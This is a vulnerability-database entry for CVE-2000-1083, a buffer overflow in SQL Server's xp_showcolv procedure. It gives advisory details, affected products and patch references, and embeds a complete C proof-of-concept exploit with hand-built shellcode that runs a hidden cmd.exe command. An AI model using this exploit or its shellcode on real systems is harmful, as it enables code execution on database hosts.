CVE-2000-1083
CVSS2.1
发布时间 :2001-01-09 00:00:00
修订时间 :2016-10-17 22:08:28
NMCOES    

[原文]The xp_showcolv function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability.


[CNNVD]Microsoft SQL Server / Data Engine xp_showcolv缓冲区溢出漏洞(CNNVD-200101-112)

        SQL Server和Microsoft SQL Server Desktop Engine (MSDE)的xp_showcolv函数在调用Extended Stored Procedures (XP)的SQL Server API中的srv_paraminfo函数之前不能正确地限制缓冲区的长度,攻击者可以导致服务拒绝或者执行任意命令,也称为"Extended Stored Procedure Parameter Parsing"漏洞。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:sql_server:2000Microsoft SQL Server 2000
cpe:/a:microsoft:data_engine:1.0Microsoft data_engine 1.0
cpe:/a:microsoft:sql_server:7.0Microsoft SQLServer 7.0
cpe:/a:microsoft:data_engine:2000Microsoft data_engine 2000

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1083
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1083
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-112
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=97570878710037&w=2
(UNKNOWN)  ATSTAKE  20001201 Microsoft SQL Server extended stored procedure vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-092.asp
(VENDOR_ADVISORY)  MS  MS00-092
http://www.securityfocus.com/bid/2038
(VENDOR_ADVISORY)  BID  2038

- 漏洞信息

Microsoft SQL Server / Data Engine xp_showcolv缓冲区溢出漏洞
低危 边界条件错误
2001-01-09 00:00:00 2006-09-01 00:00:00
本地  
        SQL Server和Microsoft SQL Server Desktop Engine (MSDE)的xp_showcolv函数在调用Extended Stored Procedures (XP)的SQL Server API中的srv_paraminfo函数之前不能正确地限制缓冲区的长度,攻击者可以导致服务拒绝或者执行任意命令,也称为"Extended Stored Procedure Parameter Parsing"漏洞。

- 公告与补丁

        Microsoft has released the following patches which eliminate the vulnerability:
        Microsoft SQL Server 2000
        
        Microsoft SQL Server 7.0
        

- 漏洞信息 (20456)

Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability (EDBID:20456)
windows local
2000-12-01 Verified
0 David Litchfield
N/A [点击下载]
source: http://www.securityfocus.com/bid/2038/info

The API Srv_paraminfo(), which is implemented by Extended Stored Procedures (XPs) in Microsoft SQL Server and Data Engine, is susceptible to a buffer overflow vulnerability which may cause the application to fail or arbitrary code to be executed on the target system depending on the data entered into the buffer.

XPs are DLL files that perform high level functions in SQL Server. When called, they invoke a function called Srv_paraminfo() to parse the input parameters.

A vulnerability lies in Srv_paraminfo() and the fact that it does not check the length of the parameter string that an XP passes to it. If an attacker can pass an overly long string to the XP xp_showcolv, a buffer overflow can occur due to an unsafe memory copy. This can cause SQL Server to crash.

It may also be possible for attackers to execute arbitrary code on the host running SQL Server. The attacker would need to overwrite the return address of the calling function with the address of supplied shellcode in memory. This shellcode would be executed under the context of the account that the SQL Server service was configured to run under. The minimum privilege level that the account would have to possess are SYSTEM privileges.

This vulnerability is confined to those who can successfully log onto the SQL server. 

#include <stdio.h>
#include <windows.h>
#include <wchar.h>
#include <lmcons.h>
#include <sql.h>
#include <sqlext.h>


int main(int argc, char *argv[])
{
	char szBuffer[1025];  //display successful connection info on
                              //hdbc(s) combo-box    
	SWORD     swStrLen;               //String length   
	SQLHDBC   hdbc;                   //hdbc    
	SQLRETURN nResult;             
	SQLHANDLE henv;
	HSTMT  hstmt;
	SCHAR InConnectionString[1025] = "DRIVER={SQL Server};SERVER=";
	SCHAR server[100]="";
	SCHAR uid[32]=";UID=";
	SCHAR pwd[32]=";PWD=";
	SCHAR *db=";DATABASE=master";

	UCHAR query[20000] = "exec  xp_displayparamstmt '";
	unsigned char ch=0x01;

	int count = 27, var =0, result = 0, chk =0;
	
	if(argc !=4)
	{
		printf("USAGE:\t%s host uid pwd\nDavid Litchfield 9th November 2000\n",argv[0]);
		return 0;
	}

	strncpy(server,argv[1],96);
	strncat(uid,argv[2],28);
	strncat(pwd,argv[3],28);

	strncat(InConnectionString,server,96);
	strncat(InConnectionString,uid,28);
	strncat(InConnectionString,pwd,28);
	strcat(InConnectionString,db);


	while(count < 12083)
	{
			query[count]=0x90;
			count++;
	}

	// jmp eax
	query[count++]=0xFF;
	query[count++]=0xE0;
	
	// nops
	query[count++]=0x90;
	query[count++]=0x90;

	// overwrite saved return address
	query[count++]=0xAE;
	query[count++]=0x20;
	query[count++]=0xA6;
	query[count++]=0x41;

	// code starts in ernest

	query[count++]=0x90;
	// mov edx,eax
	query[count++]=0x8B;
	query[count++]=0xD0;

	// add edx,0x52 <- points to our string table
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x52;

	// push ebp
	query[count++]=0x55;

	// mov ebp,esp
	query[count++]=0x8B;
	query[count++]=0xEC;

	// mov edi,0x41A68014
	query[count++]=0xBF;
	query[count++]=0x14;
	query[count++]=0x80;
	query[count++]=0xA6;
	query[count++]=0x41;


	//mov esi,0x41A68040
	query[count++]=0xBE;
	query[count++]=0x40;
	query[count++]=0x80;
	query[count++]=0xA6;
	query[count++]=0x41;

	// mov ecx, 0xFFFFFFFF
	query[count++]=0xB9;
	query[count++]=0xFF;
	query[count++]=0xFF;
	query[count++]=0xFF;
	query[count++]=0xFF;


	 

	// sub ecx, 0xFFFFFFB3
	query[count++]=0x83;
	query[count++]=0xE9;
	query[count++]=0xB3;

	// here:

	// sub dword ptr[edx],1
	query[count++]=0x83;
	query[count++]=0x2A;
	query[count++]=0x01;

	// add edx,1
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x01;

	// sub ecx,1
	query[count++]=0x83;
	query[count++]=0xE9;
	query[count++]=0x01;

	// test ecx,ecx
	query[count++]=0x85;
	query[count++]=0xC9;

	// jne here
	query[count++]=0x75;
	query[count++]=0xF3;

	// sub edx, 0x48
	query[count++]=0x83;
	query[count++]=0xEA;
	query[count++]=0x48;

	// push edx <- calling LoadLibrary will mess edx so save it on stack
	// Even though we're about to push edx as an arg to LoadLibrary
	// we have to push it twice as LoadLibrary will remove one of them
	// from the stack - once the call has returned pop it back into edx

	query[count++]=0x52; 

	// LoadLibrary("kernel32.dll");
	// push edx
	query[count++]=0x52;

	// call [edi]
	query[count++]=0xFF;
	query[count++]=0x17;


	
	// pop edx
	query[count++]=0x5A;


	// On return LoadLibrary has placed a handle in EAX
	// save this on this stack for later use
	// push eax
	query[count++]=0x50;


	// GetProcAddress(HND,"WinExec");
	// add edx, 0x10
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x10;


	// push edx
	// need to save this again - pop it when GetProcAddress returns

	query[count++]=0x52;

	//push edx
	query[count++]=0x52;

	// push eax
	query[count++]=0x50;

	// call [esi]
	query[count++]=0xFF;
	query[count++]=0x16;

	// pop edx
	query[count++]=0x5A;

	// WinExec("cmd.exe /c.....",SW_HIDE);
	// add edx, 0x08
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x08;


	// push edx
	query[count++]=0x52; // <- save edx

	// xor ebx,ebx
	query[count++]=0x33;
	query[count++]=0xDB;

	// push ebx
	query[count++]=0x53;

	// push edx
	query[count++]=0x52;

	// call eax
	query[count++]=0xFF;
	query[count++]=0xD0;


	// With the shell spawned code now calls ExitProcess()

	//pop edx
	query[count++]=0x5A;

	
	// pop eax <- This is saved handle to kernel32.dll
	query[count++]=0x58;



	// GetProcAddress(HND,"ExitProcess");
	// add edx,0x24
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x24;


	// push edx
	query[count++]=0x52;

	// push eax
	query[count++]=0x50;

	// call [esi]
	query[count++]=0xFF;
	query[count++]=0x16;


	// call ExitProcess(0);
	// xor ebx,ebx
	query[count++]=0x33;
	query[count++]=0xDB;

	// push ebx
	query[count++]=0x53;

	// call eax
	query[count++]=0xFF;
	query[count++]=0xD0;


	// Here are our strings
	// kernel32.dll, WinExec, cmd.exe /c ... , ExitProcess
	// 1 has been added to each character to 'hide' the nulls
	// the loop will sub 1 from each char

	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x6c;
	query[count++]=0x66;
	query[count++]=0x73;
	query[count++]=0x6f;
	query[count++]=0x66;
	query[count++]=0x6d;
	query[count++]=0x34;
	query[count++]=0x33;
	query[count++]=0x2f;
	query[count++]=0x65;
	query[count++]=0x6d;
	query[count++]=0x6d;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x58;
	query[count++]=0x6a;
	query[count++]=0x6f;
	query[count++]=0x46;
	query[count++]=0x79;
	query[count++]=0x66;
	query[count++]=0x64;
	query[count++]=0x01;
	query[count++]=0x64;
	query[count++]=0x6e;
	query[count++]=0x65;
	query[count++]=0x2f;
	query[count++]=0x66;
	query[count++]=0x79;
	query[count++]=0x66;
	query[count++]=0x21;
	query[count++]=0x30;
	query[count++]=0x64;
	query[count++]=0x21;
	query[count++]=0x65;
	query[count++]=0x6a;
	query[count++]=0x73;
	query[count++]=0x21;
	query[count++]=0x3f;
	query[count++]=0x21;
	query[count++]=0x64;
	query[count++]=0x3b;
	query[count++]=0x5d;
	query[count++]=0x74;
	query[count++]=0x72;
	query[count++]=0x6d;
	query[count++]=0x70;
	query[count++]=0x77;
	query[count++]=0x66;
	query[count++]=0x73;
	query[count++]=0x73;
	query[count++]=0x76;
	query[count++]=0x6f;
	query[count++]=0x2f;
	query[count++]=0x75;
	query[count++]=0x79;
	query[count++]=0x75;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x46;
	query[count++]=0x79;
	query[count++]=0x6a;
	query[count++]=0x75;
	query[count++]=0x51;
	query[count++]=0x73;
	query[count++]=0x70;
	query[count++]=0x64;
	query[count++]=0x66;
	query[count++]=0x74;
	query[count++]=0x74;
	query[count++]=0x01;




	strcat(query,"',2,3");

	
	
	if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv) !=
SQL_SUCCESS)
		{
			printf("Error SQLAllocHandle");
			return 0;

		}

	if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
		{
			printf("Error SQLSetEnvAttr");
			return 0;

		}


	if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR
*)&hdbc)) != SQL_SUCCESS) 
		{
			printf("SQLAllocHandle - 2");
			return 0;
			
		}

	nResult = SQLDriverConnect(hdbc, NULL, InConnectionString,
strlen(InConnectionString), szBuffer,  1024, &swStrLen,
SQL_DRIVER_COMPLETE_REQUIRED);      
	if(nResult == SQL_SUCCESS | nResult == SQL_SUCCESS_WITH_INFO)
		{

			printf("Connected to MASTER database...\n\n");
			SQLAllocStmt(hdbc,&hstmt);
		}

	else
	{
		printf("Couldn't connect.\n");
		return 0;
	}

	if(SQLExecDirect(hstmt,query,SQL_NTS) !=SQL_SUCCESS)
		{
			printf("\nBuffer has been  sent...c:\\sqloverrun.txt should now exist.");

			return 0;

		}
	printf("Buffer sent...");	
	


return 0;
}
		

- 漏洞信息

10149
Microsoft SQL Server xp_showcolv Function Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in SQL Server, SQL Server Data Engine and MSDE. The programs fail to properly parse input in the xp_showcolv() function resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code or a denial of service resulting in a loss of integrity, and/or availability.

- 时间线

2000-12-01 Unknow
2000-12-01 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft SQL Server / Data Engine xp_showcolv Buffer Overflow Vulnerability
Boundary Condition Error 2038
No Yes
2000-12-01 12:00:00 2009-07-11 03:56:00
Discovered by David Litchfield <dlitchfield@atstake.com> and publicized in Microsoft Security Bulletin (MS00-092) on December 1, 2000.

- 受影响的程序版本

Microsoft SQL Server 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
Microsoft SQL Server 7.0
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Data Engine 2000
+ Akiva WebBoard 6.1
+ BindView bv-Admin for Microsoft Exchange
+ BindView bv-Admin for Windows 7.0
+ BindView bv-Admin for Windows Migration
+ BindView bv-control for Active Directory 7.0.2
+ BindView bv-Control for Internet Security 7.0.1
+ BindView bv-Control for Microsoft Exchange 7.0
+ BindView bv-Control for Microsoft SQL Server 7.0.1
+ BindView bv-Control for Microsoft SQL Server 7.0
+ BindView bv-Control for Windows 7.0.2
+ CARI-RUSCO Secure Perfect 3.0
+ CCH Equity Compliance Insider Reporting Module
+ Collins Medical Plus 2000
+ Computer Associates Unicenter
+ Computer Associates Unicenter RC/Update 6.1
+ Computer Associates Unicenter RC/Update 6.0
+ CSIRO BioLink Software 1.5
+ DATA.TXT Corporation Time Matters 4.0
+ DATA.TXT Corporation Time Matters 3.0
+ Dell OpenManage IT Assistant 6.0
+ Dell OpenManage IT Assistant 5.0
+ Express Metrix Express Software Manager 6.0.2
+ Express Metrix Express Software Manager 6.0.1
+ Express Metrix Express Software Manager 6.0
+ Express Metrix Express Software Manager 5.0
+ Fluke Networks Optiview Network Inspector 5.0
+ HP Openview Internet Services 4.5
+ HP Openview Internet Services 4.0
+ HP Openview Operations for Windows 7.1
+ HP Openview Operations for Windows 7.0
+ HP Openview Operations for Windows 6.0
+ HP Openview Reporter 3.0
+ HP Openview Reporter 2.0.2
+ ISI Infortel for Windows 5.4
+ ISI Infortel for Windows 5.2
+ ISI Infortel for Windows 5.1
+ ISI Infortel for Windows 4.0
+ Journyx Timesheet 5.0
+ Journyx Timesheet 4.6
+ Journyx Timesheet 4.5 m3
+ Journyx Timesheet 4.5 m2
+ Journyx Timesheet 4.5
+ Journyx Timesheet 2.0
+ Microsoft .NET Framework 1.1
+ Microsoft .NET Framework 1.0 SP1
+ Microsoft .NET Framework 1.0
+ Microsoft .NET Framework SDK 1.0
+ Microsoft Application Center 2000
+ Microsoft Biztalk Server 2002 Partner Edition 0
+ Microsoft FrontPage 2000 Server Extensions SR 1.3
+ Microsoft FrontPage 2000 Server Extensions SR 1.2
+ Microsoft FrontPage 2000 Server Extensions SR 1.1
+ Microsoft FrontPage 2000 Server Extensions SR 1.0
+ Microsoft Great Plains 5.5.1
+ Microsoft Great Plains 7.0
+ Microsoft Great Plains 5.5
+ Microsoft Great Plains 5.0
+ Microsoft Office 2000 SP2
+ Microsoft Office 2000 SP1
+ Microsoft Office 2000
+ Microsoft Office 2000 Chinese Version
+ Microsoft Office 2000 Japanese Version
+ Microsoft Office 2000 Korean Version
+ Microsoft Office XP SP1
+ Microsoft Office XP
+ Microsoft Office XP Developer Edition
+ Microsoft Project Central Server
+ Microsoft SharePoint Portal Server 2001 SP1
+ Microsoft SharePoint Portal Server 2001
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SQL Server 2000 SP3
+ Microsoft SQL Server 2000 SP2
+ Microsoft SQL Server 2000 SP1
+ Microsoft SQL Server 2000
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 7.0 SP1
+ Microsoft Visual FoxPro 7.0
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ Microsoft Visual Studio .NET Trial Edition 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows XP Embedded SP1
+ Microsoft Windows XP Embedded
+ MIP NonProfit Series Pro 4.5
+ MIP NonProfit Series Pro 4.4
+ MIP NonProfit Series Pro 4.3
+ NetSupport NetSupport TCO 4.5.1
+ NetSupport NetSupport TCO 4.5
+ Network Associates SupportMagic SQL 4.5
+ Okena StormWatch
+ Peachtree Software Timeslips 11.0
+ Peachtree Software Timeslips 10.0
+ Peachtree Software Timeslips 9.0
+ Peachtree Software Timeslips 9.0
+ Peachtree Software Timeslips 8.0
+ Peachtree Software Timeslips 7.0
+ Peachtree Software Timeslips 6.0
+ QiNetix CommVault Galaxy 4.0.1
+ SalesLogix Corporation SalesLogix 2000.0
+ SmartMax Software MailMax 5.0
+ TeleStream FlipFactory 3.0
+ TeleStream FlipFactory 2.0
+ TeleStream FlipFactory 1.2
+ Veritas Software Backup Exec for Windows Servers 9.0
+ VIGILANTe SecureScan NX 2.5
+ Visionary Systems Firehouse Software 5.4
+ Visionary Systems Firehouse Software 5.0.2 5
+ Visionary Systems Firehouse Software 5.0
+ Visionary Systems Firehouse Software 3.0.5
+ Wonderware InTouch 7.11
+ Xerox CentreWare Web 1.0
Microsoft Data Engine (MSDE) 1.0
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0
+ Affymetrix Microarray Suite Software 5.0
+ Affymetrix Microarray Suite Software 5.0
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.0.1
+ Altiris Deployment Server 5.0.1
+ Altiris Deployment Server 5.0.1
+ Centennial UK Ltd Centennial Discovery 4.4
+ Centennial UK Ltd Centennial Discovery 4.4
+ Centennial UK Ltd Centennial Discovery 4.4
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0
+ Compaq Insight Manager 7.0
+ Compaq Insight Manager 7.0
+ Gerber Technology WebPDM 3.9
+ Gerber Technology WebPDM 3.9
+ Gerber Technology WebPDM 3.9
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.0
+ McAfee ePolicy Orchestrator 1.0
+ McAfee ePolicy Orchestrator 1.0
- Microsoft Access 2000
- Microsoft Access 2000
- Microsoft Access 2000
- Microsoft Project Central Server
- Microsoft Project Central Server
- Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SharePoint Team Services from Microsoft
- Microsoft Visual Studio 6.0
- Microsoft Visual Studio 6.0
- Microsoft Visual Studio 6.0
+ PowerQuest ControlCenter ST 2.0
+ PowerQuest ControlCenter ST 2.0
+ PowerQuest ControlCenter ST 2.0
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Trend Micro Control Manager 2.5
+ Trend Micro Control Manager 2.5
+ Trend Micro Control Manager 2.5
+ Trend Micro Damage Cleanup Server 1.0
+ Trend Micro Damage Cleanup Server 1.0
+ Trend Micro Damage Cleanup Server 1.0
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1

- 漏洞讨论

The API Srv_paraminfo(), which is implemented by Extended Stored Procedures (XPs) in Microsoft SQL Server and Data Engine, is susceptible to a buffer overflow vulnerability which may cause the application to fail or arbitrary code to be executed on the target system depending on the data entered into the buffer.

XPs are DLL files that perform high level functions in SQL Server. When called, they invoke a function called Srv_paraminfo() to parse the input parameters.

A vulnerability lies in Srv_paraminfo() and the fact that it does not check the length of the parameter string that an XP passes to it. If an attacker can pass an overly long string to the XP xp_showcolv, a buffer overflow can occur due to an unsafe memory copy. This can cause SQL Server to crash.

It may also be possible for attackers to execute arbitrary code on the host running SQL Server. The attacker would need to overwrite the return address of the calling function with the address of supplied shellcode in memory. This shellcode would be executed under the context of the account that the SQL Server service was configured to run under. The minimum privilege level that the account would have to possess are SYSTEM privileges.

This vulnerability is confined to those who can successfully log onto the SQL server.

- 漏洞利用

@Stake &lt;researchlabs@atstake.com&gt; has released the following proof-of-concept code:

- 解决方案

Microsoft has released the following patches which eliminate the vulnerability:


Microsoft SQL Server 2000

Microsoft SQL Server 7.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站